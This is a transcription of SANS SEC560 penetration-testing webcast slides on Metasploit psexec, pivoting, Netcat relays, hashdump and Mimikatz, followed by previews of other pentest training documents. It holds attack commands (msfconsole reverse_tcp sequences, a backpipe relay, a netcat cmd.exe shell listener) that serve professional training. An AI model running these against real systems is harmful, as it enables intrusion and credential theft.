A Taste of SANS SEC 560: Adventures in High-Value Pen Testing

Size: px
Start display at page:

Download "A Taste of SANS SEC 560: Adventures in High-Value Pen Testing"

Transcription

1 All Rights Reserved 1 Network Penetration Testing and Ethical Hacking A Taste of SANS SEC 560: Adventures in High-Value Pen Testing SANS Security 560 Copyright 2015, All Rights Reserved Version 2Q15 All Rights Reserved 2 1

2 Ed Skoudis edskoudis For Ed Skoudis to introduce himself as: - A penetration tester and iident handler - An SANS Instructor - A course author: SANS SEC504 & SEC560 - The SANS Pen Test Curriculum Lead - Director of NetWars & CyberCity projects Ed Skoudis Ed Skoudis 04/06/ /06/2015 All Rights Reserved 3 All Rights Reserved 4 2

3 SEC 560 Course Outline 5601: Comprehensive Planning, Scoping, and Recon 5602: In-Depth Scanning 5603: Exploitation & Post Exploitation 5604: Password Attacks & Merciless Pivoting 5605: Wireless and Web Apps 5606: Full-Day Pen Test Lab and Capture the Flag Contest All Rights Reserved 5 About the SANS SEC 560 Course Our focus is on helping you master the skills needed for hands-on network penetration testing and ethical hacking Organized around the workflow of professional testers Numerous hands-on labs, culminating in a fullday end-to-end penetration test in 5606 Tips for avoiding common pitfalls And saving time to make the tester more efficient and to make the test safer All Rights Reserved 6 3

4 A Formal Penetration Testing Definition Penetration testing involves modeling the techniques used by real-world computer attackers To find vulnerabilities And, under controlled circumstaes, to exploit those flaws In a professional, safe manner according to a carefully designed scope and rules of engagement To determine business risk and potential impact all with the goal of helping the organization improve security practices All Rights Reserved 7 Why Exploitation? False positive reduction / elimination But, even if exploit doesn t work, you still may want to report on detected vulnerability Proof of vulnerability and therefore more realistic treatment of risk Use of one machine as a pivot point to get deeper inside the network More of a sense of what a real bad guy can accomplish Exploitation leads to post-exploitation which really helps us understand the business risks that the target organization faces due to discovered vulnerabilities DMZ System DMZ System Internal System Internal System Firewall Firewall All Rights Reserved 8 4

5 Risks of Exploitation Service crash System crash System stability impacted System integrity violated Data exposure with legal ramifications As a penetration tester, you likely do not want to be in possession of millions of credit card numbers or other similarly sensitive information Inadvertently accessing the wrong system Out of scope or even the wrong target organization Because of these coerns, verify that exploitation is allowed by Rules of Engagement And double check for a given system whether it is in scope Also, understand the probabilistic nature of exploit success All Rights Reserved 9 The Metasploit Arsenal Exploit Collection Exploit 1 Exploit 2 Exploit N User Interface Choose Payload Collection Payload 1 Payload 2 Payload M Auxiliary Modules Aux 1 Aux 2 Exploit 2 Payload 1 Lauher Send to target Aux N Post Modules Post 1 Post 2 Post N Metasploit divides up the coept of exploits, payloads, auxiliary, and post modules An exploit takes advantage of a flaw in a target program The payload makes the target do something the attacker wants Auxiliary modules perform all kinds of tasks, iluding scanning A post module is used in post-exploitation to plunder targets or manipulate them All Rights Reserved 10 5

6 Metasploit psexec Module Metasploit iludes a fantastic psexec module It's an exploit module, although it is not really exploiting a specific vulnerability Establishes an session with the target RHOST using a provided admin-level User and Pass, causing the target to run a specified Metasploit payload Writes an executable into the target file system, creates a service with a pseudo-random name, runs the payload with local SYSTEM privileges, and then automatically removes the executable and service, cleaning up after itself Select it at msfconsole using: msf > use exploit/windows/smb/psexec Also supports pass-the-hash, authenticating to target via an admin username and hash This module IS ONE OF THE MOST USEFUL IN ALL OF METASPLOIT, especially in a well-patched internal network environment All Rights Reserved 11 Psexec & the Pen Tester s Pledge All Rights Reserved 12 6

7 Meterpreter Futionality: Pivoting using Metasploit s Route Command Metasploit iludes a route command to pivot through an already-exploited host via a Meterpreter session Carries follow-on exploits and payloads across Meterpreter session Don t confuse this with the Meterpreter route command, which manages routing tables on a compromised system running Meterpreter msf > use [exploit1] msf > set RHOST [victim1] msf > set PAYLOAD windows/meterpreter/reverse_tcp msf > exploit meterpreter > (CTRL-Z to background session will display meterpreter sid) msf > route add [victim2_subnet] [netmask] [sid] msf > use [exploit2] msf > set RHOST [victim2] msf > set PAYLOAD [payload2] msf > exploit Pen Tester Exploit1 Meterpreter Victim1 Exploit2 Payload2 Victim2 All Rights Reserved 13 Sending Through a Netcat Relay to Pivot through Linux # mknod backpipe p # l p 445 0<backpipe tee backpipe Linux Relay Machine listener client Attacker client Mount Share, Psexec, Grab hashes, etc Target Service C:\> net use \\Linux\c$ [password] /u:[user] All Rights Reserved 14 7

8 Dumping Authentication Information from Memory with Mimikatz Mimikatz was created by Benjamin Delpy (also known as gentilkiwi) Pulls authentication information from memory on a machine Searches through LSASS memory of various specific locations, looking for password hashes and ***clear text passwords*** Originally, a separate executable (mimikatzexe) to load on a target machine and run Now, it s a Metasploit Meterpreter module All Rights Reserved 15 Course Roadmap Planning and Recon Scanning Exploitation & Post-Exploitation Password Attacks Wireless Attacks Web App Attacks Motivation and Defs Password Attack Tips Account Lockout Password Guessing with THC-Hydra Ø Lab: Hydra Password Representation Formats Obtaining Hashes Ø Lab: Fgdump & Netcat Pivot Hashdump More Hash Dumping Options Ø Lab: Msf psexec & Mimikatz John the Ripper Ø Lab: John the Ripper Cain Ø Lab: Cain Rainbow Table Attacks Ø Lab: Ophcrack Pass-the-Hash Attacks Ø Lab: Pass-the-Hash All Rights Reserved 16 8

9 Using MSF psexec, a Netcat relay, Meterpreter, & hashdump Your Linux Metasploit Compromised Linux DMZ Target listener client psexec Meterpreter hashdump Target 2 Services All Rights Reserved Target 1 Services Lauhing Metasploit and Choosing psexec Module All Rights Reserved 18 9

10 Configuring Metasploit (1) All Rights Reserved 19 Configuring Metasploit (2) Your Linux Metasploit Linux Target psexec Meterpreter All Rights Reserved 20 10

11 Preparing the Relay & Exploiting Your Linux Metasploit Linux Target psexec Meterpreter Look at the details of this session s connection, between and your Linux box All Rights Reserved 21 Dumping the Hashes Note that run hashdump can also dump password hints that users create, if they are present All Rights Reserved 22 11

12 Using msf route to Pivot and Mimikatz Let s use the msf route command to pivot across our Meterpreter session on to attack Getting Meterpreter on , and then loading Mimikatz Your Linux Metasploit Compromised Linux DMZ Target Existing Meterpreter Session Msf route to pivot thru for psexec on New Meterpreter Session Load Mimikatz and dump hashes & passwords DMZ Target Services 445 allowed from net DMZ Target Services All Rights Reserved 23 Background Session & Prepare to Attack Linux Target Existing Meterpreter Your Linux Session Metasploit 80 Msf route to pivot thru for psexec on New Meterpreter Session All Rights Reserved 24 12

13 Exploit through Pivot As long as you see the meterpreter > prompt here, it worked Don t worry about this Exploit failed warning As long as you see Session N created it worked All Rights Reserved 25 Get System Info Your Linux Existing Meterpreter 80 Session Metasploit New Meterpreter Session 443 Load Mimikatz and dump hashes & passwords Our session is with ! All Rights Reserved 26 13

14 Load Mimikatz and Dump Passwords Clear text password below! All Rights Reserved 27 Exiting & Lab Colusions In this lab, we ve seen how to use Metasploit s psexec module to deliver a Meterpreter payload through a Netcat relay so that we can dump hashes And, we ve seen how we can use a Metasploit route to pivot through a target machine to load Mimikatz to dump clear-text passwords All Rights Reserved 28 14

15 Webcast Colusions Pen testing can help a target organization better understand its risk posture and manage risks Penetration testers can take advantage of plentiful tools and techniques in our work: Metasploit and the Meterpreter Psexec for code execution via Netcat relays and msfconsole route for pivots Hashdump and Mimikatz for credentials Know your tools in-depth, and never lose your focus on providing as much business value as you can in your penetration test! It s not the weapon that s important It s the Ninja wielding it All Rights Reserved 29 All Rights Reserved 30 15

Penetration Testing with Kali Linux

Penetration Testing with Kali Linux Penetration Testing with Kali Linux PWK Copyright Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security No part of this publication, in whole or in part, may

More information

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services Following topics will be covered: Module 1: Penetration Testing Planning and Scoping - Types of penetration testing and ethical hacking projects - Penetration testing methodology - Limitations and benefits

More information

Lab 3: Introduction to Metasploit

Lab 3: Introduction to Metasploit Lab 3: Introduction to Metasploit Aim: The airm of this lab is to develop and execute exploits against a remote machine and test its vulnerabilities using Metasploit. Quick tool introduction: Metasploit

More information

PILLAGE THE. More Pen Test Adventures in Post Exploitation. By John Strand & Ed Skoudis. Special Thanks to Mike Poor

PILLAGE THE. More Pen Test Adventures in Post Exploitation. By John Strand & Ed Skoudis. Special Thanks to Mike Poor PILLAGE THE VILLAGEEDUX R More Pen Test Adventures in Post Exploitation By John Strand & Ed Skoudis Special Thanks to Mike Poor Original Pillager of the Village http://inguardians.com/pubs/ Core-PillagetheVIllage.pdf

More information

Advanced Penetration Testing

Advanced Penetration Testing Advanced Penetration Testing Additional Insights from Georgia Weidman More Guessable Credentials: Apache Tomcat In the course we looked at specific examples of vulnerabilities. My goal was to cover as

More information

You can find the lab demo here:

You can find the lab demo here: Lab 8: Armitage Aim The aim of this lab is to introduce you to Armitage. Armitage developed by Raphael Mudge provides an open source Graphical User Interface (GUI) front end to Metasploit and supports

More information

Live Adversary Simulation: Red and Blue Team Tactics

Live Adversary Simulation: Red and Blue Team Tactics SESSION ID: HTA-T06 Live Adversary Simulation: Red and Blue Team Tactics James Lyne Head of R&D SANS Institute @JamesLyne Stephen Sims Security Researcher & Fellow SANS Institute @Steph3nSims Agenda 2

More information

ETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6

ETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6 ETHICAL HACKING LAB SERIES Lab 13: Exploitation with IPv6 Certified Ethical Hacking Domains: System Hacking, Penetration Testing Document Version: 2015-08-14 otherwise noted, is licensed under the Creative

More information

ISDP 2018 Industry Skill Development Program In association with

ISDP 2018 Industry Skill Development Program In association with ISDP 2018 Industry Skill Development Program In association with Penetration Testing What is penetration testing? Penetration testing is simply an assessment in a industry computer network to test the

More information

AUTHOR CONTACT DETAILS

AUTHOR CONTACT DETAILS AUTHOR CONTACT DETAILS Name Dinesh Shetty Organization Paladion Networks Email ID dinesh.shetty@paladion.net Penetration Testing with Metasploit Framework When i say "Penetration Testing tool" the first

More information

CPTE: Certified Penetration Testing Engineer

CPTE: Certified Penetration Testing Engineer www.peaklearningllc.com CPTE: Certified Penetration Testing Engineer (5 Days) *Includes exam voucher, course video, an exam preparation guide About this course Certified Penetration Testing Engineer certification

More information

CONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7

CONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7 CONTENTS IN DETAIL FOREWORD by HD Moore xiii PREFACE xvii ACKNOWLEDGMENTS xix Special Thanks... xx INTRODUCTION xxi Why Do A Penetration Test?... xxii Why Metasploit?... xxii A Brief History of Metasploit...

More information

Metasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space

Metasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity

More information

Windows Hash Reinjection Using GSECDUMP and MSVCTL By Deron Grzetich

Windows Hash Reinjection Using GSECDUMP and MSVCTL By Deron Grzetich Windows Hash Reinjection Using GSECDUMP and MSVCTL By Deron Grzetich Intro The objective of this exercise is to prove that gsecdump and msvctl actually work as prescribed. These tools can be used to reinject

More information

ECCouncil Exam v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ]

ECCouncil Exam v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ] s@lm@n ECCouncil Exam 312-50v9 Certified Ethical Hacker Exam V9 Version: 7.0 [ Total Questions: 125 ] Question No : 1 An Intrusion Detection System(IDS) has alerted the network administrator to a possibly

More information

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking Summer Training Internship Program 2017 (STIP - 2017) is a practical oriented & industrial level training program for all students who have aspiration to work in the core technical industry domain. This

More information

BraindumpsIT. BraindumpsIT - IT Certification Company provides Braindumps pdf!

BraindumpsIT.   BraindumpsIT - IT Certification Company provides Braindumps pdf! BraindumpsIT http://www.braindumpsit.com BraindumpsIT - IT Certification Company provides Braindumps pdf! Exam : GPEN Title : GIAC Certified Penetration Tester Vendor : GIAC Version : DEMO Get Latest &

More information

Audience. Pre-Requisites

Audience. Pre-Requisites T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices

More information

Vulnerability Validation Tutorial

Vulnerability Validation Tutorial Vulnerability Validation Tutorial Last updated 01/07/2014-4.8 Vulnerability scanning plays a key role in the vulnerability management process. It helps you find potential vulnerabilities so that you can

More information

Contents. Auditing Microsoft Domain Environment

Contents. Auditing Microsoft Domain Environment Contents About the Author...2 About The Microsoft Domain Environments:...3 About Auditing:...4 Gaining First User:...5 Enumerating AD Users and Groups With Gained User:...8 Checking Common Vulnerabilities:...12

More information

SECURITY TESTING. Towards a safer web world

SECURITY TESTING. Towards a safer web world SECURITY TESTING Towards a safer web world AGENDA 1. 3 W S OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS ate: 2013-14 Few Security Breaches September

More information

Web Application Penetration Testing

Web Application Penetration Testing Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate

More information

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test Tyler Rasmussen Mercer Engineer Research Center About Me Cybersecurity Engineering Intern @ MERC Senior IT/Cybersecurity

More information

cs642 /introduction computer security adam everspaugh

cs642 /introduction computer security adam everspaugh cs642 computer security /introduction adam everspaugh ace@cs.wisc.edu definition Computer Security := understanding and improving the behavior of computing systems in the presence of adversaries adversaries

More information

CUNY John Jay College of Criminal Justice MATH AND COMPUTER SCIENCE

CUNY John Jay College of Criminal Justice MATH AND COMPUTER SCIENCE Instructor: Prof Aftab Ahmad Office: NB 612 Telephone No. (212)393-6314 Email Address: aahmad@jjay.cuny.edu Office Hours: By appointment TEXT & REFERENCE MATERIAL Text Notes from instructor posted on Blackboard

More information

DIS10.2. DIS10.2:Advanced Penetration Testing and Security Analyst Certification. Online Training Classroom Training Workshops Seminars

DIS10.2. DIS10.2:Advanced Penetration Testing and Security Analyst Certification. Online Training Classroom Training Workshops Seminars Online Training Classroom Training Workshops Seminars DIS10.2 Data and Information security Council of India DIS10.2:Advanced Penetration Testing and Security Analyst Certification HACKERS ARE NOT BORN,

More information

TexSaw Penetration Te st in g

TexSaw Penetration Te st in g TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This

More information

GAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit

GAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit Unit 17. Metasploit Metasploit is one of the most powerful tools used for penetration testing. Most of its resources can be found at www.metasploit.com. It comes in two versions: commercial and free edition.

More information

JARGON ALERT! VULNERABILITY SCAN PENETRATION TEST RED TEAM/BLUE TEAM

JARGON ALERT! VULNERABILITY SCAN PENETRATION TEST RED TEAM/BLUE TEAM root@ssh1:~#whoami DIRECTOR OF TECHNOLOGY AND INFORMATION SYSTEMS 20+ YEARS CERTIFIED INFORMATION SYSTEMS SECURITY PROFESSIONAL (CISSP) CERTIFIED GIAC SYSTEM AND NETWORK AUDITOR (GSNA) CERTIFIED GIAC INCIDENT

More information

DIS10.1 Ethical Hacking and Countermeasures

DIS10.1 Ethical Hacking and Countermeasures DIS10.1 Ethical Hacking and Countermeasures ABOUT DIS Why choose Us. Data and internet security council is the worlds top most information security certification body. Our uniquely designed course for

More information

Ethical Hacking and Prevention

Ethical Hacking and Prevention Ethical Hacking and Prevention This course is mapped to the popular Ethical Hacking and Prevention Certification Exam from US-Council. This course is meant for those professionals who are looking for comprehensive

More information

What is Penetration Testing?

What is Penetration Testing? What is Penetration Testing? March 2016 Table of Contents What is Penetration Testing?... 3 Why Perform Penetration Testing?... 4 How Often Should You Perform Penetration Testing?... 4 How Can You Benefit

More information

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK Hacker Academy Ltd COURSES CATALOGUE Hacker Academy Ltd. LONDON UK TABLE OF CONTENTS Basic Level Courses... 3 1. Information Security Awareness for End Users... 3 2. Information Security Awareness for

More information

Nmap & Metasploit. Chun-Jen (James) Chung. Arizona State University

Nmap & Metasploit. Chun-Jen (James) Chung. Arizona State University Nmap & Metasploit Chun-Jen (James) Chung Nmap recap Nmap uses raw IP packets in novel ways to determine what hosts are available on the network What services (application name and version) those hosts

More information

DIS10.1:Ethical Hacking and Countermeasures

DIS10.1:Ethical Hacking and Countermeasures 1 Data and Information security Council DIS10.1:Ethical Hacking and Countermeasures HACKERS ARE NOT BORN, THEY BECOME HACKER About DIS :Data and Internet Security Council DIS is the Globally trusted Brand

More information

Breach-zilla: Lessons Learned from Large-Scale Breaches

Breach-zilla: Lessons Learned from Large-Scale Breaches Breach-zilla: Lessons Learned from Large-Scale Breaches Ed Skoudis v4q11r Breach-Zilla 2011, Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996

More information

Certified Secure Web Application Engineer

Certified Secure Web Application Engineer Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),

More information

State of the. Union. (or: How not to use Krebs as an IDS ) (Information Security) Jeff McJunkin Senior Technical Analyst Counter Hack Challenges

State of the. Union. (or: How not to use Krebs as an IDS ) (Information Security) Jeff McJunkin Senior Technical Analyst Counter Hack Challenges State of the (Information Security) Union (or: How not to use Krebs as an IDS ) Jeff McJunkin Senior Technical Analyst Counter Hack Challenges My background IT Systems / Network Administrator for City

More information

Security Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE

Security Testing. - a requirement for a secure business. ISACA DAY in SOFIA. Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE Gabriel Mihai Tanase, Director, Cyber Services KPMG in CEE Cyber Security Services Security Testing - a requirement for a secure business ISACA DAY in SOFIA Agenda No Agenda Some minimum theory More real

More information

Contents in Detail. Foreword by Peter Van Eeckhoutte

Contents in Detail. Foreword by Peter Van Eeckhoutte Contents in Detail Foreword by Peter Van Eeckhoutte xix Acknowledgments xxiii Introduction xxv A Note of Thanks.... xxvi About This Book.... xxvi Part I: The Basics.... xxvii Part II: Assessments.........................................

More information

Lab 4: Metasploit Framework

Lab 4: Metasploit Framework CSC 5991 Cyber Security Practice Lab 4: Metasploit Framework Introduction If I had eight hours to chop down a tree, I d spend the first six of them sharpening my axe. -Abraham Lincoln In this lab, you

More information

1. On Kali, first start the PostgreSQL database management and metasploit services:

1. On Kali, first start the PostgreSQL database management and metasploit services: Lab 8: Armitage Armitage provides an open source GUI front end to Metaploit and supports the security testing against a range of vulnerabilities. We will mainly be using your Kali instance and a Windows

More information

Automated Attack Framework for Test & Evaluation (AAFT)

Automated Attack Framework for Test & Evaluation (AAFT) Automated Attack Framework for Test & Evaluation (AAFT) 34 th International Test and Evaluation Association Symposium October 4, 2017 Mr. Andrew Shaffer The Applied Research Laboratory The Pennsylvania

More information

The Bad Guys Are Winning So Now What?

The Bad Guys Are Winning So Now What? The Bad Guys Are Winning So Now What? Ed Skoudis v1q13 Bad Guys Are Winning Now What? - 2013 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd Ed Skoudis grep -i skoudis Started infosec career at Bellcore in 1996

More information

Stamp Out Hash Corrup/on, Crack All the Things!

Stamp Out Hash Corrup/on, Crack All the Things! Stamp Out Hash Corrup/on, Crack All the Things! Ryan Reynolds Manager, Crowe Horwath Pentester TwiAer: @reynoldsrb Jonathan Claudius SpiderLabs Security Researcher, Trustwave Vulnerability Research TwiAer:

More information

RastaLabs Red Team Simulation Lab

RastaLabs Red Team Simulation Lab RastaLabs Red Team Simulation Lab LAB OUTLINE Description RastaLabs is a virtual Red Team Simulation environment, designed to be attacked as a means of learning and honing your engagement skills. The focus

More information

10 FOCUS AREAS FOR BREACH PREVENTION

10 FOCUS AREAS FOR BREACH PREVENTION 10 FOCUS AREAS FOR BREACH PREVENTION Keith Turpin Chief Information Security Officer Universal Weather and Aviation Why It Matters Loss of Personally Identifiable Information (PII) Loss of Intellectual

More information

Protect Your Organization from Cyber Attacks

Protect Your Organization from Cyber Attacks Protect Your Organization from Cyber Attacks Leverage the advanced skills of our consultants to uncover vulnerabilities our competitors overlook. READY FOR MORE THAN A VA SCAN? Cyber Attacks by the Numbers

More information

CSWAE Certified Secure Web Application Engineer

CSWAE Certified Secure Web Application Engineer CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized

More information

SECURITY TESTING: WINDOWS OS

SECURITY TESTING: WINDOWS OS International Journal of Latest Research In Engineering and Computing (IJLREC) Volume 2, Issue 6, Page No. 1-11 www.ijlrec.com ISSN: 2347-6540 SECURITY TESTING: WINDOWS OS 1 Siddhanth Lathar, 2 Dr. Ashish

More information

PND at a glance: The World s Premier Online Practical Network Defense course. Self-paced, online, flexible access

PND at a glance: The World s Premier Online Practical Network Defense course. Self-paced, online, flexible access The World s Premier Online Practical Network Defense course PND at a glance: Self-paced, online, flexible access 1500+ interactive slides (PDF, HTML5 and Flash) 5+ hours of video material 10 virtual labs

More information

Bojan Ždrnja, CISSP, GCIA, GCIH, GWAPT INFIGO IS

Bojan Ždrnja, CISSP, GCIA, GCIH, GWAPT INFIGO IS Laterally pwning Windows Bojan Ždrnja, CISSP, GCIA, GCIH, GWAPT Bojan.Zdrnja@infigo.hr INFIGO IS http://www.infigo.hr Who am I? Senior information security consultant at INFIGO IS Penetration testing (all

More information

Computer Security: Cyber Essentials KAMI VANIEA 1

Computer Security: Cyber Essentials KAMI VANIEA 1 Computer Security: Cyber Essentials DR. KAMI VANIEA KAMI VANIEA 1 First, the news http://www.sbrcentre.co.uk/images/site_images/20522_small BusinessTheCyberRiskReportVoRFINALFeb2016.pdf http://www.informationisbeautiful.net/visualizations/worldsbiggest-data-breaches-hacks/

More information

دوره تست نفوذ. Ver.1.2 شما میتوانید آنلاین در این دوره ثبت نام بلافاصله از آن استفاده کنید. Information Gathering. Bash scripting

دوره تست نفوذ. Ver.1.2 شما میتوانید آنلاین در این دوره ثبت نام بلافاصله از آن استفاده کنید. Information Gathering. Bash scripting Ver.1.2 Information Gathering Bash scripting Information gathering (passive) شما میتوانید آنلاین در این دوره ثبت نام کنید و بلافاصله از آن استفاده کنید. دیدن نمونه آموزش هاي دوره تست نفوذ Google operators

More information

Security Solutions. Overview. Business Needs

Security Solutions. Overview. Business Needs Security Solutions Overview Information security is not a one time event. The dynamic nature of computer networks mandates that examining and ensuring information security be a constant and vigilant effort.

More information

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?

More information

Cyber security tips and self-assessment for business

Cyber security tips and self-assessment for business Cyber security tips and self-assessment for business Last year one in five New Zealand SMEs experienced a cyber-attack, so it s essential to be prepared. Our friends at Deloitte have put together this

More information

KERBEROS PARTY TRICKS

KERBEROS PARTY TRICKS KERBEROS PARTY TRICKS Weaponizing Kerberos Protocol Flaws Geoffrey Janjua Who is Exumbra Operations Group? Security services and consulting Specialized services: Full scope red-team testing, digital and

More information

What action do you want to perform by issuing the above command?

What action do you want to perform by issuing the above command? 1 GIAC - GPEN GIACCertified Penetration Tester QUESTION: 1 You execute the following netcat command: c:\target\nc -1 -p 53 -d -e cmd.exe What action do you want to perform by issuing the above command?

More information

ETHICAL HACKING LAB SERIES. Lab 15: Abusing SYSTEMS

ETHICAL HACKING LAB SERIES. Lab 15: Abusing SYSTEMS ETHICAL HACKING LAB SERIES Lab 15: Abusing SYSTEMS Certified Ethical Hacking Domain: Denial of Service Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution 3.0

More information

Exploit Development. License. Contents. General notes about the labs. General notes about the labs. Preparation. Introduction to exploit development

Exploit Development. License. Contents. General notes about the labs. General notes about the labs. Preparation. Introduction to exploit development Exploit Development License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. All included software source

More information

Useful Hacking Series

Useful Hacking Series Useful Hacking Series Welcome to the Useful Hacking Series, in this series of 20 Episodes our world-renowned penetration tester/international speaker will share with you the top useful tips used during

More information

ETHICAL HACKING LAB SERIES. Lab 7: Breaking Windows Passwords

ETHICAL HACKING LAB SERIES. Lab 7: Breaking Windows Passwords ETHICAL HACKING LAB SERIES Lab 7: Breaking Windows Passwords Certified Ethical Hacking Domain: System Hacking Document Version: 2015-08-14 otherwise noted, is licensed under the Creative Commons Attribution

More information

CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud

CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud Go to Google Cloud Console => Compute Engine => VM instances => Create Instance For the Boot Disk, click "Change", then

More information

Hacking in the Attack Kill Chain

Hacking in the Attack Kill Chain Hacking in the Attack Kill Chain Håkan Nohre, Consulting Systems Engineer, GIAC GPEN #9666, CISSP #76731 Erkan Djafer, Consulting Systems Engineer, CISSP #535930 Chung-wai Lee, Cyber Security Partner Account

More information

IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10

IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10 IMEC Cybersecurity for Manufacturers Penetration Testing and Top 10 Christian Espinosa, Alpine Security www.alpinesecurity.com 1 Objectives Learn about penetration testing Learn what to consider when selecting

More information

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

The SANS Institute Top 20 Critical Security Controls. Compliance Guide The SANS Institute Top 20 Critical Security Controls Compliance Guide February 2014 The Need for a Risk-Based Approach A common factor across many recent security breaches is that the targeted enterprise

More information

Computers Gone Rogue. Abusing Computer Accounts to Gain Control in an Active Directory Environment. Marina Simakov & Itai Grady

Computers Gone Rogue. Abusing Computer Accounts to Gain Control in an Active Directory Environment. Marina Simakov & Itai Grady Computers Gone Rogue Abusing Computer Accounts to Gain Control in an Active Directory Environment Marina Simakov & Itai Grady Motivation Credentials are a high value target for attackers No need for 0-day

More information

About The Presentation 11/3/2017. Hacker HiJinx-Human Ways to Steal Data. Who We Are? Ethical Hackers & Security Consultants

About The Presentation 11/3/2017. Hacker HiJinx-Human Ways to Steal Data. Who We Are? Ethical Hackers & Security Consultants November 3, 2017 Hacker HiJinx-Human Ways to Steal Data Who We Are? Ethical Hackers & Security Consultants Respond To Incidents & Breaches Perform Digital Forensic Investigations Data Mine Internet Intelligence

More information

Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper

Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Modern Day Penetration Testing Distribution Open Source Platform - Kali Linux - Study Paper Devanshu Bhatt Abstract: Penetration testing is extremely crucial method to discover weaknesses in systems and

More information

PENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco

PENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco PENETRATION TESTING A HattdA-Oti Introduction to Hacking by Georgia Weidman no starch press San Francisco CONTENTS IN DETAIL FOREWORD by Peter Van Eeckhoutte xix ACKNOWLEDGMENTS xxiii INTRODUCTION

More information

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline

CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker. Upcoming Dates. Course Description. Course Outline CISSP CEH PKI SECURITY + CEHv9: Certified Ethical Hacker Learn to find security vulnerabilities before the bad guys do! The Certified Ethical Hacker (CEH) class immerses students in an interactive environment

More information

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring Learning Objective Explain the importance of security audits, testing, and monitoring to effective security policy.

More information

Coding for Penetration

Coding for Penetration Coding for Penetration Testers Building Better Tools Jason Andress Ryan Linn ELSEVIER AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO SINGAPORE SYDNEY TOKYO Syngress is

More information

Computer Security 2017

Computer Security 2017 Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the

More information

Computer Security 2017

Computer Security 2017 Computer Security 2017 Lab 1: Passwords, access control, and remote exploitation of Windows 7 This lab will be done in groups of 2 people. There are preparatory assignments for this lab, read through the

More information

ITSY 2330 Intrusion Detection Course Syllabus

